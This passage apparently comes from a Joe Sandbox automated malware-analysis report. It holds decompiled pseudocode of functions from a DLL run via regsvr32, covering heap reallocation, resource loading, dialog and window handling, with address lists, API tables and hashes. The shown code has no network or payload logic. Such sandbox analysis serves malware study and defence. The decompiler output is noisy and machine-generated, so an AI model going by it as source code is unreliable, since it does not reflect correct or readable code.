								__eflags =  *0x1004f58c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								goto L27;
							}
							E10013A38(0, _t59, 4);
							 *(_t67 - 4) = 0;
							_t33 = E10013B9B(_t59);
							 *(_t67 - 0x20) = _t33;
							__eflags = _t33;
							if(_t33 == 0) {
								L21:
								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
								E100124B7();
								__eflags =  *(_t67 - 0x20);
								if( *(_t67 - 0x20) == 0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t61 = _t61 + 0x0000000f & 0xfffffff0;
									__eflags = _t61;
									 *(_t67 + 0xc) = _t61;
									 *(_t67 - 0x1c) = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
								}
								goto L25;
							}
							__eflags = _t61 -  *0x10050a50; // 0x0
							if(__eflags <= 0) {
								_push(_t61);
								_push(_t59);
								_push(_t33);
								_t41 = E1001409B();
								_t68 = _t68 + 0xc;
								__eflags = _t41;
								if(_t41 == 0) {
									_push(_t61);
									_t42 = E1001437A();
									 *(_t67 - 0x1c) = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
										 *(_t67 - 0x24) = _t44;
										__eflags = _t44 - _t61;
										if(_t44 >= _t61) {
											_t44 = _t61;
										}
										E10011440( *(_t67 - 0x1c), _t59, _t44);
										_t46 = E10013B9B(_t59);
										 *(_t67 - 0x20) = _t46;
										_push(_t59);
										_push(_t46);
										E10013BC6();
										_t68 = _t68 + 0x18;
									}
								} else {
									 *(_t67 - 0x1c) = _t59;
								}
							}
							__eflags =  *(_t67 - 0x1c);
							if( *(_t67 - 0x1c) == 0) {
								__eflags = _t61;
								if(_t61 == 0) {
									_t61 = 1;
									__eflags = 1;
									 *(_t67 + 0xc) = 1;
								}
								_t61 = _t61 + 0x0000000f & 0xfffffff0;
								 *(_t67 + 0xc) = _t61;
								_t36 = HeapAlloc( *0x10050a60, 0, _t61);
								 *(_t67 - 0x1c) = _t36;
								__eflags = _t36;
								if(_t36 != 0) {
									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
									 *(_t67 - 0x24) = _t38;
									__eflags = _t38 - _t61;
									if(_t38 >= _t61) {
										_t38 = _t61;
									}
									E10011440( *(_t67 - 0x1c), _t59, _t38);
									_push(_t59);
									_push( *(_t67 - 0x20));
									E10013BC6();
									_t68 = _t68 + 0x14;
								}
							}
							goto L21;
							L27:
							_t31 = E10014676(_t61);
							__eflags = _t31;
						} while (_t31 != 0);
						goto L36;
					} else {
						_push(_t59);
						E100107C8(0, _t59, _t61, __eflags);
						L36:
						_t28 = 0;
						__eflags = 0;
						goto L37;
					}
				} else {
					_t28 = E100107B6( *(_t67 + 0xc));
					L37:
					return E1001254F(_t28);
				}
			}
















                                                                                                            0x1001234f
                                                                                                            0x10012351
                                                                                                            0x10012356
                                                                                                            0x1001235b
                                                                                                            0x10012362
                                                                                                            0x10012372
                                                                                                            0x10012375
                                                                                                            0x10012377
                                                                                                            0x10012385
                                                                                                            0x1001238c
                                                                                                            0x100124c0
                                                                                                            0x100124c0
                                                                                                            0x100124c2
                                                                                                            0x100124c5
                                                                                                            0x100124c7
                                                                                                            0x100124c9
                                                                                                            0x100124cd
                                                                                                            0x100124cd
                                                                                                            0x100124cd
                                                                                                            0x100124d7
                                                                                                            0x100124d7
                                                                                                            0x100124dd
                                                                                                            0x100124df
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100124e1
                                                                                                            0x100124e7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100124ea
                                                                                                            0x100124f0
                                                                                                            0x100124f2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100124f2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10012392
                                                                                                            0x10012392
                                                                                                            0x10012392
                                                                                                            0x10012395
                                                                                                            0x10012398
                                                                                                            0x1001248f
                                                                                                            0x1001248f
                                                                                                            0x10012492
                                                                                                            0x10012494
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10012496
                                                                                                            0x1001249c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001249c
                                                                                                            0x100123a0
                                                                                                            0x100123a6
                                                                                                            0x100123aa
                                                                                                            0x100123b0
                                                                                                            0x100123b3
                                                                                                            0x100123b5
                                                                                                            0x1001245f
                                                                                                            0x1001245f
                                                                                                            0x10012463
                                                                                                            0x10012468
                                                                                                            0x1001246b
                                                                                                            0x1001246d
                                                                                                            0x1001246f
                                                                                                            0x10012473
                                                                                                            0x10012473
                                                                                                            0x10012473
                                                                                                            0x10012477
                                                                                                            0x10012477
                                                                                                            0x1001247a
                                                                                                            0x1001248c
                                                                                                            0x1001248c
                                                                                                            0x00000000
                                                                                                            0x1001246b
                                                                                                            0x100123bb
                                                                                                            0x100123c1
                                                                                                            0x100123c3
                                                                                                            0x100123c4
                                                                                                            0x100123c5
                                                                                                            0x100123c6
                                                                                                            0x100123cb
                                                                                                            0x100123ce
                                                                                                            0x100123d0
                                                                                                            0x100123d7
                                                                                                            0x100123d8
                                                                                                            0x100123de
                                                                                                            0x100123e1
                                                                                                            0x100123e3
                                                                                                            0x100123e8
                                                                                                            0x100123e9
                                                                                                            0x100123ec
                                                                                                            0x100123ee
                                                                                                            0x100123f0
                                                                                                            0x100123f0
                                                                                                            0x100123f7
                                                                                                            0x100123fd
                                                                                                            0x10012402
                                                                                                            0x10012405
                                                                                                            0x10012406
                                                                                                            0x10012407
                                                                                                            0x1001240c
                                                                                                            0x1001240c
                                                                                                            0x100123d2
                                                                                                            0x100123d2
                                                                                                            0x100123d2
                                                                                                            0x100123d0
                                                                                                            0x1001240f
                                                                                                            0x10012412
                                                                                                            0x10012414
                                                                                                            0x10012416
                                                                                                            0x1001241a
                                                                                                            0x1001241a
                                                                                                            0x1001241b
                                                                                                            0x1001241b
                                                                                                            0x10012421
                                                                                                            0x10012424
                                                                                                            0x1001242f
                                                                                                            0x10012435
                                                                                                            0x10012438
                                                                                                            0x1001243a
                                                                                                            0x1001243f
                                                                                                            0x10012440
                                                                                                            0x10012443
                                                                                                            0x10012445
                                                                                                            0x10012447
                                                                                                            0x10012447
                                                                                                            0x1001244e
                                                                                                            0x10012453
                                                                                                            0x10012454
                                                                                                            0x10012457
                                                                                                            0x1001245c
                                                                                                            0x1001245c
                                                                                                            0x1001243a
                                                                                                            0x00000000
                                                                                                            0x1001249e
                                                                                                            0x1001249f
                                                                                                            0x100124a5
                                                                                                            0x100124a5
                                                                                                            0x00000000
                                                                                                            0x10012379
                                                                                                            0x10012379
                                                                                                            0x1001237a
                                                                                                            0x100124f4
                                                                                                            0x100124f4
                                                                                                            0x100124f4
                                                                                                            0x00000000
                                                                                                            0x100124f4
                                                                                                            0x10012364
                                                                                                            0x10012367
                                                                                                            0x100124f6
                                                                                                            0x100124fb
                                                                                                            0x100124fb

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                                                            • Instruction ID: a1aac842a28fd1c9b1a5d11719d9853ed47685f9db5387583b2c03217e3948c7
                                                                                                            • Opcode Fuzzy Hash: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                                                            • Instruction Fuzzy Hash: A641F5F1D002669FCB20EF698C8489F7AB4EB417A47124129FA24AE151D734DDE0DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100071BF Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E100071BF(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t59;
				signed int _t61;
				signed int _t62;
				void* _t64;
				int* _t72;
				struct HWND__* _t73;
				intOrPtr _t78;
				struct HRSRC__* _t81;
				void* _t82;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t101;
				intOrPtr _t103;
				struct HINSTANCE__* _t105;
				intOrPtr* _t106;
				void* _t107;

				_t106 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if(_a8 != 0) {
					_t105 =  *(E100373B5() + 0xc);
					_t81 = FindResourceA(_t105, _a8, 0xf0);
					if(_t81 != 0) {
						_t82 = LoadResource(_t105, _t81);
						_v12 = _t82;
						if(_t82 == 0) {
							return 0;
						}
						_v8 = LockResource(_t82);
					}
				}
				__eflags = _v8;
				_t86 = _a4;
				_t103 = _a12;
				_v16 = 1;
				if(_v8 != 0) {
					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
					__eflags = _v12;
					_v16 = _t78;
					if(_v12 != 0) {
						FreeResource(_v12);
					}
				}
				_t59 =  *(_t86 + 0x48);
				__eflags = _t59;
				if(_t59 == 0) {
					L25:
					return _v16;
				} else {
					_t88 =  *(_t59 + 0x40);
					_a8 = _a8 & 0x00000000;
					__eflags = _t88;
					_a4 = _t88;
					_v12 = _t88;
					if(_t88 != 0) {
						_a8 =  *(E10006D96( &_a4));
					}
					_t61 = 0;
					__eflags =  *(_t103 + 8);
					_v8 = 0;
					if( *(_t103 + 8) > 0) {
						do {
							_t89 = _a8;
							__eflags = _t89;
							if(_t89 == 0) {
								L17:
								_t90 =  *((intOrPtr*)(_t103 + 0xc));
								_t62 = _t61 << 3;
								__eflags =  *(_t62 + _t90);
								_v20 = _t62;
								if( *(_t62 + _t90) != 0) {
									_t107 = E1001F77E(0xc);
									__eflags = _t107;
									if(_t107 == 0) {
										_t107 = 0;
										__eflags = 0;
									} else {
										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
										 *(_t107 + 8) = _t72[1];
										_t103 = _a12;
										 *_t107 = _t73;
									}
									_t93 =  *(_t86 + 0x48) + 0x3c;
									__eflags = _v12;
									_push(_t107);
									if(__eflags == 0) {
										E1001E118(_t93, __eflags);
									} else {
										_push(_v12);
										E1001DF55(_t93);
									}
								}
								goto L24;
							}
							_t95 =  *((intOrPtr*)(_t89 + 4));
							_t101 =  *((intOrPtr*)(_t103 + 0xc));
							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
								goto L17;
							} else {
								_t64 = _a4;
								__eflags = _t64;
								_v12 = _t64;
								if(_t64 == 0) {
									_a8 = _a8 & 0x00000000;
								} else {
									_a8 =  *(E10006D96( &_a4));
								}
							}
							L24:
							_t61 = _v8 + 1;
							__eflags = _t61 -  *(_t103 + 8);
							_v8 = _t61;
						} while (_t61 <  *(_t103 + 8));
					}
					goto L25;
				}
			}



























                                                                                                            0x100071cd
                                                                                                            0x100071cf
                                                                                                            0x100071d2
                                                                                                            0x100071d5
                                                                                                            0x100071dc
                                                                                                            0x100071e8
                                                                                                            0x100071f0
                                                                                                            0x100071f4
                                                                                                            0x100071fc
                                                                                                            0x100071ff
                                                                                                            0x00000000
                                                                                                            0x10007201
                                                                                                            0x1000720f
                                                                                                            0x1000720f
                                                                                                            0x100071f0
                                                                                                            0x10007212
                                                                                                            0x10007215
                                                                                                            0x10007218
                                                                                                            0x1000721b
                                                                                                            0x10007222
                                                                                                            0x1000722d
                                                                                                            0x10007230
                                                                                                            0x10007234
                                                                                                            0x10007237
                                                                                                            0x1000723c
                                                                                                            0x1000723c
                                                                                                            0x10007237
                                                                                                            0x10007242
                                                                                                            0x10007245
                                                                                                            0x10007247
                                                                                                            0x10007328
                                                                                                            0x00000000
                                                                                                            0x1000724d
                                                                                                            0x1000724d
                                                                                                            0x10007250
                                                                                                            0x10007254
                                                                                                            0x10007256
                                                                                                            0x10007259
                                                                                                            0x1000725c
                                                                                                            0x1000726c
                                                                                                            0x1000726c
                                                                                                            0x1000726f
                                                                                                            0x10007271
                                                                                                            0x10007274
                                                                                                            0x10007277
                                                                                                            0x1000727d
                                                                                                            0x1000727d
                                                                                                            0x10007280
                                                                                                            0x10007282
                                                                                                            0x100072b8
                                                                                                            0x100072b8
                                                                                                            0x100072bb
                                                                                                            0x100072be
                                                                                                            0x100072c2
                                                                                                            0x100072c5
                                                                                                            0x100072ce
                                                                                                            0x100072d0
                                                                                                            0x100072d3
                                                                                                            0x100072fa
                                                                                                            0x100072fa
                                                                                                            0x100072d5
                                                                                                            0x100072de
                                                                                                            0x100072e6
                                                                                                            0x100072ec
                                                                                                            0x100072f0
                                                                                                            0x100072f3
                                                                                                            0x100072f6
                                                                                                            0x100072f6
                                                                                                            0x100072ff
                                                                                                            0x10007302
                                                                                                            0x10007306
                                                                                                            0x10007307
                                                                                                            0x10007313
                                                                                                            0x10007309
                                                                                                            0x10007309
                                                                                                            0x1000730c
                                                                                                            0x1000730c
                                                                                                            0x10007307
                                                                                                            0x00000000
                                                                                                            0x100072c5
                                                                                                            0x10007284
                                                                                                            0x10007287
                                                                                                            0x1000728d
                                                                                                            0x10007290
                                                                                                            0x00000000
                                                                                                            0x10007292
                                                                                                            0x10007292
                                                                                                            0x10007295
                                                                                                            0x10007297
                                                                                                            0x1000729a
                                                                                                            0x100072b2
                                                                                                            0x1000729c
                                                                                                            0x100072ad
                                                                                                            0x100072ad
                                                                                                            0x1000729a
                                                                                                            0x10007318
                                                                                                            0x1000731b
                                                                                                            0x1000731c
                                                                                                            0x1000731f
                                                                                                            0x1000731f
                                                                                                            0x1000727d
                                                                                                            0x00000000
                                                                                                            0x10007277

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 100071E8
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 100071F4
                                                                                                            • LockResource.KERNEL32(00000000), ref: 10007209
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1000723C
                                                                                                            • GetDlgItem.USER32 ref: 100072E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeItemLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 996205394-0
                                                                                                            • Opcode ID: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                                                            • Instruction ID: 3ddb78cc740fa9bd2d00af88598f625c67c34797d15b04e165b588e19e6e1fdb
                                                                                                            • Opcode Fuzzy Hash: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                                                            • Instruction Fuzzy Hash: 37516B35A00209EFEB14CFA5C884A9EBBF5FF44390F508469E80A9B255D734EA41DF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10009B77 Relevance: 7.6, APIs: 5, Instructions: 126windowthreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E10009B77(void* __ebx, void* __ecx) {
				void* _t62;
				long _t63;
				void* _t76;

				E10011BF0(0x1003ae2b, _t76);
				_t62 =  *((intOrPtr*)(_t76 + 0xc)) + 0x2cc;
				if(_t62 > 0xf) {
					L20:
					_t63 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t62 + 0x10009d63) & 0x000000ff) * 4 +  &M10009D3B))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L19;
						case 1:
							_t65 =  *((intOrPtr*)(_t76 + 0x10));
							 *(_t65 + 8) =  *(_t65 + 8) | 0x0000ffff;
							 *_t65 = 0xb;
							goto L19;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							E1000A369( *(__ebp + 8)) =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L19;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							 *__eax = 0xb;
							goto L19;
						case 4:
							__eax = E100243B2();
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)( *__eax + 0xc))();
							 *(__ebp + 0xc) = __eax;
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E10006A60(__ebp + 0xc, 0xf1c0);
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
							__ecx =  *(__ebp + 0xc);
							 *(__esi + 8) = __eax;
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							__eflags = __ecx;
							goto L18;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							 *(__esi + 8) = GetThreadLocale();
							goto L19;
						case 6:
							__eflags =  *(__esi + 0x58) - 0xffffffff;
							if( *(__esi + 0x58) == 0xffffffff) {
								_push( *(__esi + 0x1c));
								__ecx = __ebp - 0x20;
								E10029194(__ebp - 0x20) =  *(__esi + 0x1c);
								 *( *(__esi + 0x1c) + 0x1c) = SendMessageA( *( *(__esi + 0x1c) + 0x1c), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x1c) + 0x1c));
								 *(__esi + 0x58) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x5c) = __eax;
								__eax = E100291EF(__ebp - 0x20, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x5c);
							} else {
								__esi =  *(__esi + 0x58);
							}
							 *(__eax + 8) = __esi;
							goto L19;
						case 7:
							__eflags =  *(__esi + 0x60);
							if( *(__esi + 0x60) != 0) {
								L13:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x60);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *(__esi + 0x60);
								 *(__edi + 8) =  *(__esi + 0x60);
								goto L19;
							} else {
								__ecx =  *(__esi + 0x1c);
								__eax = E100090C8( *(__esi + 0x1c));
								__ecx = __esi;
								__eax = E1000943B(__esi, __eax);
								__eflags =  *(__esi + 0x60);
								if( *(__esi + 0x60) == 0) {
									goto L20;
								} else {
									goto L13;
								}
							}
							goto L21;
						case 8:
							__eax = E100243B2();
							__edx =  *__eax;
							__ecx = __eax;
							_t43 = __eax + 0x10; // 0x10
							__esi = _t43;
							 *(__ebp + 0xc) = __esi;
							__edi =  *(__ebp + 0x10);
							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
							__ecx = __ebp + 0xc;
							 *__edi = 8;
							 *(__edi + 8) = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
							_t50 = __esi - 0x10; // 0x0
							__ecx = _t50;
							L18:
							__eax = E100014B0(__ecx, __edx);
							L19:
							_t63 = 1;
							goto L21;
						case 9:
							goto L20;
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t63;
			}






                                                                                                            0x10009b7c
                                                                                                            0x10009b89
                                                                                                            0x10009b94
                                                                                                            0x10009d29
                                                                                                            0x10009d29
                                                                                                            0x10009b9a
                                                                                                            0x10009ba1
                                                                                                            0x00000000
                                                                                                            0x10009bcc
                                                                                                            0x10009bcf
                                                                                                            0x10009bd4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009ba8
                                                                                                            0x10009bab
                                                                                                            0x10009bb0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009c82
                                                                                                            0x10009c85
                                                                                                            0x10009c88
                                                                                                            0x10009c92
                                                                                                            0x10009c94
                                                                                                            0x10009c96
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009bba
                                                                                                            0x10009bbd
                                                                                                            0x10009bc2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009ce0
                                                                                                            0x10009ce5
                                                                                                            0x10009ce7
                                                                                                            0x10009ce9
                                                                                                            0x10009cef
                                                                                                            0x10009cf7
                                                                                                            0x10009cfa
                                                                                                            0x10009d01
                                                                                                            0x10009d06
                                                                                                            0x10009d09
                                                                                                            0x10009d0c
                                                                                                            0x10009d11
                                                                                                            0x10009d16
                                                                                                            0x10009d19
                                                                                                            0x10009d1c
                                                                                                            0x10009d1c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009c9f
                                                                                                            0x10009ca2
                                                                                                            0x10009cad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009bdf
                                                                                                            0x10009be3
                                                                                                            0x10009be5
                                                                                                            0x10009be8
                                                                                                            0x10009bf0
                                                                                                            0x10009c00
                                                                                                            0x10009c12
                                                                                                            0x10009c15
                                                                                                            0x10009c1b
                                                                                                            0x10009c1e
                                                                                                            0x10009c21
                                                                                                            0x10009c21
                                                                                                            0x10009c26
                                                                                                            0x10009c2c
                                                                                                            0x10009c2f
                                                                                                            0x10009c34
                                                                                                            0x10009c3b
                                                                                                            0x10009c36
                                                                                                            0x10009c36
                                                                                                            0x10009c36
                                                                                                            0x10009c3e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009c46
                                                                                                            0x10009c4a
                                                                                                            0x10009c66
                                                                                                            0x10009c66
                                                                                                            0x10009c69
                                                                                                            0x10009c6e
                                                                                                            0x10009c71
                                                                                                            0x10009c73
                                                                                                            0x10009c77
                                                                                                            0x10009c7a
                                                                                                            0x00000000
                                                                                                            0x10009c4c
                                                                                                            0x10009c4c
                                                                                                            0x10009c4f
                                                                                                            0x10009c55
                                                                                                            0x10009c57
                                                                                                            0x10009c5c
                                                                                                            0x10009c60
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009c60
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009cb2
                                                                                                            0x10009cb7
                                                                                                            0x10009cb9
                                                                                                            0x10009cbe
                                                                                                            0x10009cbe
                                                                                                            0x10009cc1
                                                                                                            0x10009cc4
                                                                                                            0x10009cc7
                                                                                                            0x10009ccb
                                                                                                            0x10009cce
                                                                                                            0x10009cd8
                                                                                                            0x10009cdb
                                                                                                            0x10009cdb
                                                                                                            0x10009d1f
                                                                                                            0x10009d1f
                                                                                                            0x10009d24
                                                                                                            0x10009d26
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009ba1
                                                                                                            0x10009d2b
                                                                                                            0x10009d30
                                                                                                            0x10009d38

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$H_prologLocaleMessageSendTextThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 741590120-0
                                                                                                            • Opcode ID: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
                                                                                                            • Instruction ID: 17d43df59e13e7a0fc638ef54e749073bd167348119b36b57266e85b12fc2c17
                                                                                                            • Opcode Fuzzy Hash: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
                                                                                                            • Instruction Fuzzy Hash: D451543590074ADFEB20DF64C88499EB7F0FF08354F21895AE8569B3A1E774A981CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100344F5 Relevance: 7.6, APIs: 5, Instructions: 99keyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100344F5(void* __ecx, intOrPtr _a8) {
				signed int _v7;
				intOrPtr _v8;
				struct tagRECT _v24;
				void* _t44;
				void* _t48;
				void* _t52;
				void* _t57;
				void* _t64;
				signed int _t67;
				void* _t75;
				void* _t76;
				signed int _t78;

				_t75 = __ecx;
				_v8 = E100202AB(__ecx);
				GetWindowRect( *(__ecx + 0x1c),  &_v24);
				_t67 = GetSystemMetrics(0x21);
				_t78 = GetSystemMetrics(0x20);
				_t76 = E1002204B(_t75);
				if((_v7 & 0x00000010) == 0) {
					L5:
					if(_t76 < 0xa || _t76 > 0x11) {
						if(_t76 != 4) {
							goto L16;
						}
						goto L8;
					} else {
						L8:
						if((_v7 & 0x00000008) == 0) {
							InflateRect( &_v24,  ~_t78,  ~_t67);
							if((_v7 & 0x00000002) == 0) {
								L16:
								return _t76;
							}
							_t44 = _t76 - 4;
							if(_t44 == 0) {
								L21:
								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
							}
							_t48 = _t44 - 9;
							if(_t48 == 0) {
								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
							}
							_t52 = _t48 - 1;
							if(_t52 == 0) {
								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
							}
							_t57 = _t52;
							if(_t57 == 0) {
								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
							}
							if(_t57 == 1) {
								goto L21;
							}
							goto L16;
						}
						_t64 = 2;
						return _t64;
					}
				}
				if(_t76 == 3) {
					_t76 = 2;
				}
				if(GetKeyState(2) >= 0) {
					goto L5;
				} else {
					return 0;
				}
			}















                                                                                                            0x100344fe
                                                                                                            0x10034505
                                                                                                            0x1003450f
                                                                                                            0x10034521
                                                                                                            0x10034527
                                                                                                            0x10034532
                                                                                                            0x10034534
                                                                                                            0x1003454f
                                                                                                            0x10034552
                                                                                                            0x1003455c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003455e
                                                                                                            0x1003455e
                                                                                                            0x10034562
                                                                                                            0x10034573
                                                                                                            0x1003457d
                                                                                                            0x10034595
                                                                                                            0x00000000
                                                                                                            0x10034595
                                                                                                            0x10034581
                                                                                                            0x10034584
                                                                                                            0x100345d3
                                                                                                            0x00000000
                                                                                                            0x100345de
                                                                                                            0x10034586
                                                                                                            0x10034589
                                                                                                            0x00000000
                                                                                                            0x100345cd
                                                                                                            0x1003458b
                                                                                                            0x1003458c
                                                                                                            0x00000000
                                                                                                            0x100345bd
                                                                                                            0x1003458f
                                                                                                            0x10034590
                                                                                                            0x00000000
                                                                                                            0x100345ad
                                                                                                            0x10034593
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034593
                                                                                                            0x10034566
                                                                                                            0x00000000
                                                                                                            0x10034566
                                                                                                            0x10034552
                                                                                                            0x10034539
                                                                                                            0x1003453d
                                                                                                            0x1003453d
                                                                                                            0x10034549
                                                                                                            0x00000000
                                                                                                            0x1003454b
                                                                                                            0x00000000
                                                                                                            0x1003454b

